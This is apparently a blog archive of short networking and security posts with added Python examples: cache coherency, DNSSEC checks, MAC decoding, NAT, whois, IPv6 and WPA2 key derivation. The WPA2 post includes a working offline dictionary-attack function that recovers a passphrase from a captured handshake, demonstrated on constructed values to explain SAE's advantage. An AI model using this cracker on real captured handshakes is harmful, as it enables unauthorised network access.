Thursday, 28 May 2026

MESI and MOESI

MESI and MOESI are cache coherency protocols that keep data consistent across the private caches of a multi-core CPU. The letters are the states a cache line can be in: Modified, Exclusive, Shared and Invalid, with MOESI adding Owned (a dirty line that can be shared with other cores without first being written back to main memory).
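
The state transitions behind those letters, as an added example (not from the original post): a toy simulation of one cache line shared by several cores. It tracks only the per-core state of that line and counts the write-backs to memory that coherence forces; real protocols also move data on the bus and have transient states. The `moesi` switch shows the one difference the Owned state makes.

```python
"""Toy MESI/MOESI simulation for a single cache line shared by several cores.

Added example, not part of the original post: it tracks only the per-core
state of one line and counts the write-backs to memory that coherence forces.
Real protocols also carry data on the bus and have more transient states.
"""
from dataclasses import dataclass

M, O, E, S, I = "Modified", "Owned", "Exclusive", "Shared", "Invalid"


@dataclass
class Line:
    states: list          # state of this line in each core's cache
    moesi: bool = False   # True enables the extra Owned state
    writebacks: int = 0   # times a dirty copy had to be written to memory


def new_line(cores: int, moesi: bool = False) -> Line:
    return Line(states=[I] * cores, moesi=moesi)


def read(line: Line, core: int) -> str:
    """Core reads the line; returns the new state of its copy."""
    if line.states[core] != I:
        return line.states[core]          # hit: no coherence traffic at all
    others_valid = False
    for c, st in enumerate(line.states):
        if c == core or st == I:
            continue
        others_valid = True
        if st == M:
            if line.moesi:
                line.states[c] = O        # MOESI: keep the dirty data, just share it
            else:
                line.writebacks += 1      # MESI: write back to memory before sharing
                line.states[c] = S
        elif st == E:
            line.states[c] = S            # lose exclusivity, data is still clean
        # S and O copies are unaffected by another reader
    line.states[core] = S if others_valid else E
    return line.states[core]


def write(line: Line, core: int) -> str:
    """Core writes the line; it becomes Modified and every other copy is invalidated."""
    for c, st in enumerate(line.states):
        if c == core or st == I:
            continue
        if st == M and not line.moesi:
            line.writebacks += 1          # MESI flushes dirty data before invalidation;
        line.states[c] = I                # MOESI forwards it to the writer instead (not modelled)
    line.states[core] = M
    return M


def coherent(line: Line) -> bool:
    """Invariant every step must preserve: M or E implies a single valid copy;
    at most one Owned copy, which may coexist with Shared ones."""
    valid = [st for st in line.states if st != I]
    if any(st in (M, E) for st in valid) and len(valid) != 1:
        return False
    return valid.count(O) <= 1
```

Run `read`/`write` in any order and `coherent` must stay true; the `writebacks` counter is where MESI and MOESI visibly differ when one core reads a line another core has just written.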

Tuesday, 26 May 2026

Windows 11 Taskbar Icons Resize Dynamically

If you open too many applications, watch those icons shrink in your taskbar.

What is DNSSEC?

DNSSEC adds cryptographic signatures to DNS records so that a resolver can detect forged DNS answers for a signed domain.

DNSSEC stands for Domain Name System Security Extensions. It is a set of extensions that gives DNS data origin authentication and integrity, which defends against DNS spoofing, cache poisoning and man-in-the-middle tampering with answers. It does not encrypt queries, so it adds no confidentiality; that is what DNS over TLS or HTTPS is for. Note also that validation is done by the resolver, not by the end user's browser, so the protection only applies when a validating resolver is in the path.

In layman's terms, the attack it stops is one that silently sends a user to a fake copy of your site by answering their DNS lookup with the wrong address. E-commerce and SaaS platforms in particular should enable DNSSEC for this added protection.

DNSSEC can reasonably be deferred for very early stage projects where DNS hosting and server settings change frequently: a stale DS record at the parent after a provider change or key rollover makes the whole domain fail validation (and therefore fail to resolve) for everyone behind a validating resolver, a self-inflicted outage rather than a security gain.

Multi-signer DNSSEC is an additional way to implement DNSSEC, allowing two or more DNS providers to each sign the same zone with their own keys. It is described in RFC 8901 (an Informational RFC, not an Internet Standard), with contributors from Salesforce and Verisign.
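
How to check that a domain is signed and that your resolver actually validated it, as an added example (not from the original post). The script shells out to `dig` from the BIND utilities and parses its text output; the two sample outputs embedded below are constructed to show the shapes being parsed, and their RRSIG data is a placeholder, not a real signature.

```python
"""Check whether a resolver actually validated a DNSSEC-signed answer.

Added example, not part of the original post. It shells out to `dig` (BIND
utilities) and parses its text output; the two sample outputs below are
constructed to show the shapes being parsed, and the RRSIG data is dummy.
"""
import re
import subprocess
from dataclasses import dataclass


@dataclass
class DnssecStatus:
    validated: bool          # resolver set the AD (Authenticated Data) flag
    signed: bool             # the answer carried RRSIG records
    checking_disabled: bool  # CD flag: the client told the resolver not to validate


FLAGS_RE = re.compile(r"^;; flags:([^;]*);", re.MULTILINE)
RRSIG_RE = re.compile(r"^\S+\s+\d+\s+IN\s+RRSIG\s", re.MULTILINE)


def parse_dig(output: str) -> DnssecStatus:
    m = FLAGS_RE.search(output)
    flags = set(m.group(1).split()) if m else set()
    return DnssecStatus(
        validated="ad" in flags,
        signed=RRSIG_RE.search(output) is not None,
        checking_disabled="cd" in flags,
    )


def summarize(status: DnssecStatus) -> str:
    if status.validated:
        return "validated by resolver (AD set)"
    if status.checking_disabled:
        return "not validated: client sent CD"
    if status.signed:
        return "signed, but resolver did not validate (non-validating resolver?)"
    return "unsigned zone or no DNSSEC data returned"


def query(name: str, resolver: str = "1.1.1.1", rrtype: str = "A") -> DnssecStatus:
    """Live check (needs network and dig): ask a validating resolver with the DO bit set."""
    out = subprocess.run(["dig", f"@{resolver}", "+dnssec", name, rrtype],
                         capture_output=True, text=True, check=True).stdout
    return parse_dig(out)


# Constructed dig output for a validated answer (192.0.2.1 is documentation space,
# the RRSIG fields are placeholders, not a real signature).
SAMPLE_VALIDATED = """\
; <<>> DiG 9.18.24 <<>> @1.1.1.1 +dnssec example.com A
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
example.com.    3600    IN    A       192.0.2.1
example.com.    3600    IN    RRSIG   A 13 2 3600 20260601000000 20260501000000 4242 example.com. dGVzdA==
"""

# Constructed dig output for an unsigned zone: no AD flag, no RRSIG.
SAMPLE_UNSIGNED = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
unsigned.example.    300    IN    A    192.0.2.2
"""
```

The AD flag is asserted by the resolver and travels back over plain UDP, so it is only worth trusting when the resolver is local or reached over DoT/DoH; for end-to-end assurance run a validating resolver on the host itself (or use `delv`, which validates locally).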

Working with Word Templates

Word templates offer a good starting point for documents you may be required to mass-produce e.g. a document explaining IT strategy or architecture for multiple organizations.  However they may not work well out-of-the-box.

Things to look out for:

1. Word templates may do funny stuff with margins.  This is to create interesting and effective custom alignments - particularly for cover sheets. However, you may want to use more standard margins for the broader document if you need a more traditional, essay-style flow for your document.  For this go to  Layout and explore the various Margins, ranging from Narrow, Moderate, Wide up to Custom Margins.

2. Colour schemes may be garish. Decide whether to tone them down for ease of printing, or go the other way and turn them up for maximum impact.

In short, expect to do a great deal of customisation, even if you have a standard template ready-to-run.

Who's that MAC?

Got a strange MAC address connecting to your private Wifi network? 

Find out what kind of device it is using https://maclookup.app/.

The underlying database is regularly updated using IEEE and Wireshark data.

MAC addresses are 48 bits (6 bytes) long. The first 24 bits are the OUI (Organizationally Unique Identifier), assigned by the IEEE Registration Authority to the vendor or manufacturer; the last 24 bits are assigned by that manufacturer to individual devices. Two bits of the first octet are flags rather than vendor identity: the lowest bit marks a multicast (group) address and the next bit marks a locally administered address. Modern phones and laptops generate a random, locally administered address per wifi network for privacy, so a "strange" MAC whose second hex digit is 2, 6, A or E will not match any vendor in the database.
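
Decoding those bits before reaching for a vendor lookup, as an added example (not from the original post). The script does not embed the IEEE registry; `VENDOR_HINTS` is a tiny constructed table standing in for the database a site like maclookup.app queries.

```python
"""Decode the structure of a 48-bit MAC address before looking up its vendor.

Added example, not part of the original post. It does not embed the IEEE
OUI registry; VENDOR_HINTS is a tiny constructed table standing in for it.
"""
import re

# Constructed placeholder for a real OUI database keyed by the first three octets.
VENDOR_HINTS = {"A8:BB:CC": "Example Vendor (placeholder entry)"}


def mac_bytes(mac: str) -> bytes:
    """Accept 00:11:22:33:44:55, 00-11-22-33-44-55, 0011.2233.4455 or bare hex."""
    digits = re.sub(r"[:\-. ]", "", mac)
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", digits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes.fromhex(digits)


def oui(mac: str) -> str:
    """First 24 bits (3 octets) as an upper-case colon-separated OUI."""
    return mac_bytes(mac)[:3].hex(":").upper()


def is_multicast(mac: str) -> bool:
    """I/G bit: least significant bit of the first octet (01:00:5E.. and 33:33.. are multicast)."""
    return bool(mac_bytes(mac)[0] & 0x01)


def is_locally_administered(mac: str) -> bool:
    """U/L bit: second-lowest bit of the first octet. Set on randomised
    'private' Wi-Fi addresses, so the OUI is not a vendor assignment."""
    return bool(mac_bytes(mac)[0] & 0x02)


def describe(mac: str, vendors: dict = VENDOR_HINTS) -> str:
    b = mac_bytes(mac)
    if b == b"\xff" * 6:
        return "broadcast address"
    if is_multicast(mac):
        return "multicast group address, not a device"
    if is_locally_administered(mac):
        return "locally administered (likely a randomised private address); OUI lookup is meaningless"
    prefix = oui(mac)
    return f"globally unique, OUI {prefix}: {vendors.get(prefix, 'unknown vendor, look up the OUI')}"
```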

Basics of NAT

NAT refers to Network Address Translation.

NAT allows multiple devices on a private network to share a single public IP address when accessing the Internet. This conserves public addresses (the main reason it exists, given IPv4 exhaustion) and, as a side effect, hides internal addresses: an unsolicited inbound packet has no translation entry to match and is dropped. That side effect is not a substitute for a firewall, however. NAT says nothing about what internal hosts may send out, and port forwarding or UPnP punches holes through it.

Routers perform NAT to relay information between connected devices and the public Internet.
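
What the router's translation table actually does, as an added example (not from the original post): a minimal NAPT (port-translating NAT, the common home-router form and what the MASQUERADE target in an iptables nat table produces). The addresses are documentation ranges, constructed for the demonstration.

```python
"""Minimal NAPT (port-translating NAT) table, the kind a home router keeps.

Added example, not part of the original post. Addresses are from the
documentation ranges (RFC 1918 inside, 203.0.113.0/24 and 198.51.100.0/24 outside).
"""
import itertools
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class Napt:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self._ports = itertools.count(first_port)
        self.outbound_map = {}   # (proto, private_ip, private_port) -> public_port
        self.inbound_map = {}    # (proto, public_port) -> (private_ip, private_port)

    def outbound(self, pkt: Packet) -> Packet:
        """Private host -> Internet: rewrite the source to the public IP and a unique port.
        An existing mapping is reused so a flow keeps the same public port."""
        key = (pkt.proto, pkt.src_ip, pkt.src_port)
        port = self.outbound_map.get(key)
        if port is None:
            port = next(self._ports)
            self.outbound_map[key] = port
            self.inbound_map[(pkt.proto, port)] = (pkt.src_ip, pkt.src_port)
        return Packet(pkt.proto, self.public_ip, port, pkt.dst_ip, pkt.dst_port)

    def inbound(self, pkt: Packet):
        """Internet -> private host: only packets matching an existing mapping get through.
        Unsolicited packets have nowhere to go and are dropped (returns None)."""
        if pkt.dst_ip != self.public_ip:
            return None
        target = self.inbound_map.get((pkt.proto, pkt.dst_port))
        if target is None:
            return None
        private_ip, private_port = target
        return Packet(pkt.proto, pkt.src_ip, pkt.src_port, private_ip, private_port)
```

Two internal hosts using the same source port get different public ports, the reply to each is routed back by port alone, and a packet for a port with no mapping is silently discarded. That last behaviour is the whole of the "security" NAT provides.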

What is iptables?

iptables is the Linux command for maintaining the IP packet filter rules of the kernel's netfilter framework. It is used to configure security policies, control incoming and outgoing traffic and perform network address translation (NAT) via its nat table. On current distributions it is often a compatibility front-end over nftables.

iptables is not available in cmd.exe (Windows has its own firewall, managed with netsh or PowerShell), but it is available inside WSL2.

A Windows-centric administrator may therefore get little day-to-day exposure to iptables, but should nevertheless have a good working knowledge of NAT and its terminology, as it is a universal networking concept.

Convert a Word Doc into A Presentation (Ad Hoc)

A Word doc can be brought to life as a presentation quite easily.

Go to View in the Ribbon.

Under Page Movement select Side to Side (this changes the display so you can see the flow of the document; it is not strictly needed, but it helps to start visualising the flow).

Now, under Views, you will most likely see Print Layout selected. Select Read Mode instead.

This presents the document one screen at a time, which reads much like a slide presentation.

(There is also a third layout, Web Layout, which effectively turns your document into a web page, albeit in all probability a very messy one.)

Friday, 22 May 2026

The Weird World of OCSP Revocation Checks

OCSP, or Online Certificate Status Protocol (RFC 6960), lets a client such as a web browser ask a CA's responder in real time whether one specific certificate is still valid, rather than downloading and parsing the CA's whole certificate revocation list (CRL).

A single response is small, so it reduces the bandwidth and processing overhead of revocation checking, which can matter in latency-sensitive use cases such as transaction processing. The trade-offs are a network round trip to the responder for every new certificate seen, and a privacy leak: the CA learns which sites the client is visiting. OCSP stapling (the TLS status_request extension) avoids both by having the server fetch a signed response and send it inside the TLS handshake.

Statuses can be "good", "revoked" or "unknown". Note that "unknown" means the responder has no record of that certificate (for example, it was issued by a different CA), not that it is fine. Note also that most browsers "soft-fail": if the responder cannot be reached they proceed as though the status were good, so an attacker who can block the responder can also block the revocation check.

Certificate Authorities (CAs) are obliged to publish the revocation status of the certificates they issue, via CRLs, OCSP or both, so that revoked certificates can be detected.

whois under the hood (just basic TCP)

The whois protocol (RFC 3912) is a very basic TCP-based query-response protocol, on port 43, that returns registration information on domain names, IP address blocks and AS numbers. Unfortunately there is no whois client in cmd.exe by default, but one is available in WSL.

It works by opening a TCP connection (SYN, SYN+ACK, ACK), sending the query terminated by CRLF, receiving the response and closing the connection (FIN, FIN). Very basic indeed. It has no mechanism for indicating the character set used, and there has been no effort to support internationalisation in that respect; historically the predominant encoding has been US-ASCII, and a client has to guess at anything else.

It has no security provisions. Access control, integrity and confidentiality are all explicitly out of scope, so a response can be read or altered by anyone on the path.

RDAP (Registration Data Access Protocol) is the modern replacement: the same kind of data served over HTTP(S) as structured JSON, with room for authentication and proper internationalisation.
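
The entire protocol exchange in code, as an added example (not from the original post): a whois client that does exactly the connect, send, read-to-EOF sequence described above, plus a one-shot mock whois server on localhost so the exchange can be run offline. The mock's record is constructed, not real registration data; point `whois_query` at a real server such as whois.iana.org for live use.

```python
"""The whole whois protocol (RFC 3912) in a few lines: connect to TCP/43, send the
query terminated by CRLF, read until the server closes the connection.

Added example, not part of the original post. To run offline it also starts a
one-shot mock whois server on localhost with a constructed record; point
whois_query at a real server (e.g. whois.iana.org) for live use.
"""
import socket
import threading

WHOIS_PORT = 43


def whois_query(name: str, server: str, port: int = WHOIS_PORT, timeout: float = 5.0) -> str:
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(name.encode("ascii") + b"\r\n")   # no login, no TLS, no charset field
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:                               # the server's FIN ends the response
                break
            chunks.append(data)
    # The protocol cannot say which encoding it used; historically US-ASCII.
    # Decode leniently rather than crash on a registrar's stray bytes.
    return b"".join(chunks).decode("utf-8", errors="replace")


# Constructed record, not real registration data.
MOCK_RECORDS = {
    "example.com": "Domain Name: EXAMPLE.COM\r\nRegistrar: Example Registrar, Inc.\r\n",
}


def start_mock_whois_server(records: dict = MOCK_RECORDS) -> int:
    """Serve exactly one query on an ephemeral localhost port; returns that port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            query = b""
            while not query.endswith(b"\r\n"):         # query is a single CRLF-terminated line
                chunk = conn.recv(1024)
                if not chunk:
                    break
                query += chunk
            key = query.decode("ascii", errors="replace").strip().lower()
            conn.sendall(records.get(key, "No match for query.\r\n").encode("ascii"))
        srv.close()                                    # closing is the end-of-response signal

    threading.Thread(target=serve_once, daemon=True).start()
    return srv.getsockname()[1]
```

Everything on the wire is plaintext in both directions, which is the point of the "no security provisions" remark above: anyone between client and server sees the query and can rewrite the answer.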

Content Credentials

Want to know if something was generated by generative AI?  

Maybe try Content Credentials, the scheme defined by the Coalition for Content Provenance and Authenticity (C2PA) and backed by Adobe, Microsoft, Google, OpenAI and Sony. A credential is a cryptographically signed manifest attached to the file, recording how it was created and edited, including whether a generative AI tool produced it.

Adobe's Creative Cloud website details their support for it. Two caveats: the manifest is easy to strip (a screenshot or a re-encode loses it), so a file without credentials proves nothing about its origin, and a credential only tells you what the signing tool asserted about the content.

Thursday, 21 May 2026

jsDelivr - Free CDN for Open Source Projects

jsDelivr is a free CDN for open source projects ("fast, reliable, automated"). It is optimised for JS and ESM delivery (ESM here meaning ECMAScript modules, not "Enterprise Service Delivery"). Anything loaded from a third-party CDN becomes part of your supply chain: pin an exact version in the URL and add a Subresource Integrity (integrity=) hash to the script tag so that a modified file is refused by the browser.

Monday, 18 May 2026

The HTTP 400 Error

The HTTP 400 error translates to Bad Request. It can sometimes be seen when attempting a logon to a website unsuccessfully.

In short, the server has judged the request itself to be malformed and refuses to process it. Typical causes are a malformed URL, an oversized or corrupted cookie (sign-in flows accumulate a lot of cookies), or a request header the server cannot parse. Clearing the site's cookies is usually the first fix.

You can also try flushing the local DNS cache, which will not repair a malformed request but rules out a stale record sending you to the wrong server:

ipconfig /flushdns

which should yield the output "Successfully flushed the DNS Resolver Cache" if successful.

Friday, 8 May 2026

Debugging Web Access Issues with Microsoft Edge

Edge comes with Developer Tools (Ctrl+Shift+I, or F12).

These tools are surprisingly powerful. The tools appear right next to the rendered webpage in the browser.

Suppose you are trying to log in to a service called "Microsoft New Service" but it doesn't work.  The tab text says "Sign in to Microsoft New Service". Open up Dev Tools. Click on Network (the wifi-style icon). 

Now reload the webpage.  

You will see the entire flow of HTTP requests and responses. A 200 response is status code OK, a 204 means No Content; in fact, any status code from 200 to 299 is a form of success. 300 to 399 are redirections (follow the Location header to see where the sign-in flow sends you next), 400 to 499 are client errors (the server rejected the request) and 500 to 599 are server errors.

You may be surprised by the number of conditional access-related HTTP requests that are involved in an authentication attempt.

Why Pre Shared Keys are not Wifi Passwords

It is tempting to think of the wifi password as the Pre Shared Key (PSK) used to authenticate WPA2-Personal connections. In fact, the password (8 to 63 characters) is combined with the network's SSID (Service Set Identifier) and stretched with PBKDF2-HMAC-SHA1 (4096 iterations) to produce a 256-bit key. That key is the PSK, and it doubles as the Pairwise Master Key from which each session's keys are derived.

The Pre Shared Key model is not ideal for enterprise deployments: everyone shares the one secret, so anyone who knows the password and captures a client's 4-way handshake can derive that client's session keys and decrypt its traffic, and a captured handshake also allows an offline dictionary attack on the password itself. IoT devices using Pre Shared Keys are also exposed where the key leaks into plaintext logs or firmware. This is why WPA2-Enterprise abandons the PSK model in favour of per-user credentials over 802.1X/EAP.

WPA3-Personal replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange that produces a fresh master key for every session. This gives forward secrecy (a later password compromise does not decrypt earlier captures) and blocks offline dictionary attacks, since each password guess requires a live exchange with the network.
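
The derivation chain and the attack it permits, as an added example (not from the original post): the PSK/PMK from passphrase and SSID, the per-session PTK from the PMK plus the four values sent in the clear during the handshake, and an offline dictionary attack that recovers the passphrase from a passively captured handshake. The PSK derivation and the PRF follow IEEE 802.11i; the MAC addresses, nonces and EAPOL frame bytes are constructed for the demonstration, not captured from a real network.

```python
"""WPA2-Personal key derivation, and why a captured 4-way handshake plus the
passphrase (or a wordlist) recovers the session keys.

Added example, not part of the original post. The PSK derivation and the PRF
follow IEEE 802.11i; the MAC addresses, nonces and EAPOL frame bytes below are
constructed for the demonstration, not captured from a real network.
"""
import hashlib
import hmac


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits).
    This 32-byte value is the PMK; the human-readable 'Wi-Fi password' is only its input."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF: concatenated HMAC-SHA1 blocks with a running counter byte."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP) from the PMK and the four public handshake values.
    Layout: KCK (16) | KEK (16) | TK (16). Everything except the PMK is sent in the clear."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 over the frame, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic):
    """Offline dictionary attack: the attacker needs only a passive handshake capture.
    Returns the passphrase that reproduces the captured MIC, or None."""
    for pw in candidates:
        try:
            pmk = wpa2_psk(pw, ssid)
        except ValueError:
            continue
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return pw
    return None


# Constructed handshake material (documentation values, not a real capture).
AP_MAC = bytes.fromhex("0a0b0c0d0e0f")
STA_MAC = bytes.fromhex("0a1112131415")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key message 2 shape with its 16-byte MIC field zeroed,
# which is how the attacker prepares the frame before recomputing the MIC.
EAPOL_MSG2 = bytes.fromhex("0103007502010a") + b"\x00" * 9 + SNONCE + b"\x00" * 72


def demo_crack(wordlist=("letmein1", "Password1", "password", "correcthorse")):
    """Victim network: passphrase 'password' on SSID 'IEEE'. The attacker captures
    MACs, nonces, the EAPOL frame and its MIC, then tries a wordlist offline."""
    true_pmk = wpa2_psk("password", "IEEE")
    kck = derive_ptk(true_pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    captured_mic = eapol_mic(kck, EAPOL_MSG2)
    return crack(wordlist, "IEEE", AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, captured_mic)
```

Nothing in `crack` talks to the network; that is why SAE, which forces each guess to be an online exchange, is such an improvement. The 4096 PBKDF2 iterations slow each guess but do not change the outcome for a weak passphrase.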

Tuesday, 5 May 2026

Protecting RAM

Attacks on RAM are one of the arguments to better protect data in use.

There are various security attacks on RAM. One is malware that scrapes memory for plaintext secrets, e.g. credit card numbers sitting in a process's buffers before they are encrypted. Modern systems aim to encrypt data as early as possible in the processing pipeline and keep that plaintext window short.

Privileged operators (e.g. cloud admins, or anyone controlling the hypervisor) can read guest memory. This is why confidential VMs (AMD SEV-SNP, Intel TDX) encrypt guest memory with keys the hypervisor never sees, hiding data-in-use from the cloud provider.

DMA-capable devices such as Thunderbolt peripherals can read system memory directly, and with it any sensitive data in RAM. Modern operating systems restrict "hot-plug" DMA access by placing such devices behind the IOMMU (Kernel DMA Protection on Windows, for example), so a device can only reach the memory explicitly mapped for it.

Note: this list of compromise attacks is non-exhaustive. This is a big field of operations.

Microsoft's GitHub

Microsoft's GitHub is worth perusing from time-to-time. Some of the big projects are VS Code and TypeScript but many more additions are made to cover new directions like confidential computing.

Microsoft also have a website (opensource.microsoft.com) detailing their open source initiatives more broadly.  The Microsoft open source blog is also worth reading.

OHTTP

OHTTP (Oblivious HTTP) is an IETF protocol, defined in RFC 9458, for making HTTP requests that cannot be tied back to the requester.

The client encrypts each request (using HPKE) to a gateway's public key and sends it via a relay. The relay sees the client's IP address but not the request; the gateway sees the request but only the relay's address. No single party sees both who is asking and what is asked, provided the relay and gateway do not collude.

It suits small, stateless, one-off requests such as telemetry, safe-browsing lookups or DNS over HTTPS rather than general web browsing, since each request is an independent encrypted message with no session.

IPv4 vs IPv6

Purpose of IP Addresses and the Problem IPv6 Solves

An IP address (Internet Protocol address) is a numeric label to identify a network interface of a computer or network node participating in a computer network using the relevant IP version.

IPv6 was created to tackle the problem of IPv4 exhaustion.

IPv6 uses 128-bit addresses, giving an address space of 2^128 possible addresses. This contrasts massively with IPv4, whose addresses are only 32 bits (about 4.3 billion), most of which are already allocated.

Why is there no Planned IPv7?

The address space of IPv6 is so large that address exhaustion is not a foreseen possibility, and hence no IPv7 is planned at present.

What transition technologies are in play to help move to IPv6?

There are several transition technologies aimed at easing the move from IPv4 to IPv6. Dual stack (running both protocols side by side) is the most common. NAT64 with DNS64 lets IPv6-only clients reach IPv4-only servers: DNS64 synthesises an AAAA record by embedding the IPv4 address in a NAT64 prefix, and the NAT64 gateway translates the packets. Tunnelling schemes carry IPv6 inside IPv4 where the path in between does not support it.

Apart from Bigger Address Space, what else does IPv6 Bring to the Table?

Apart from the bigger address space, IPv6 also brings some useful new features: stateless address autoconfiguration (SLAAC), so hosts can configure themselves from router advertisements without DHCP; a simpler fixed-size 40-byte header, with options moved into extension headers; no broadcast (multicast is used instead); fragmentation done only by end hosts, never by routers; and, because every host can have a globally unique address, no need for NAT. IPsec support is a defined part of the protocol suite (originally mandatory to implement, now recommended). Learn these.
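
The address-space comparison and the NAT64 embedding described above, as an added example (not from the original post) using only the Python standard library. 64:ff9b::/96 is the NAT64 well-known prefix from RFC 6052; the sample addresses are documentation ranges.

```python
"""IPv4/IPv6 address-space sizes and NAT64 address synthesis with the standard library.

Added example, not part of the original post. 64:ff9b::/96 is the NAT64
well-known prefix from RFC 6052; the sample addresses are documentation ranges.
"""
import ipaddress

NAT64_WELL_KNOWN = ipaddress.IPv6Network("64:ff9b::/96")


def address_space(version: int) -> int:
    """Number of addresses in the whole IPv4 (2**32) or IPv6 (2**128) space."""
    return ipaddress.ip_network("0.0.0.0/0" if version == 4 else "::/0").num_addresses


def nat64_synthesize(ipv4: str, prefix: ipaddress.IPv6Network = NAT64_WELL_KNOWN) -> ipaddress.IPv6Address:
    """Embed an IPv4 address in the low 32 bits of a /96 NAT64 prefix (what DNS64 does
    when it synthesises an AAAA record for an IPv4-only host)."""
    if prefix.prefixlen != 96:
        raise ValueError("this helper only handles /96 NAT64 prefixes")
    return ipaddress.IPv6Address(int(prefix.network_address) | int(ipaddress.IPv4Address(ipv4)))


def nat64_extract(ipv6: str, prefix: ipaddress.IPv6Network = NAT64_WELL_KNOWN):
    """Inverse: recover the IPv4 destination a NAT64 gateway must forward to, or None."""
    addr = ipaddress.IPv6Address(ipv6)
    if addr not in prefix:
        return None
    return ipaddress.IPv4Address(int(addr) & 0xFFFFFFFF)


def classify(text: str) -> str:
    """Quick triage of an address seen in a log: version, transition markers and scope."""
    addr = ipaddress.ip_address(text)
    tags = [f"IPv{addr.version}"]
    if addr.version == 6:
        if addr.ipv4_mapped:            # ::ffff:a.b.c.d, an IPv4 peer seen on a dual-stack socket
            tags.append(f"ipv4-mapped {addr.ipv4_mapped}")
        elif addr in NAT64_WELL_KNOWN:
            tags.append(f"nat64 {nat64_extract(text)}")
        elif addr.is_link_local:
            tags.append("link-local")
    if addr.is_private:
        tags.append("private")
    elif addr.is_global:
        tags.append("global")
    return " ".join(tags)
```

When reading server logs on a dual-stack host, `classify` is the check that stops a `::ffff:` or `64:ff9b::` address being treated as a new IPv6 client when it is really an IPv4 one.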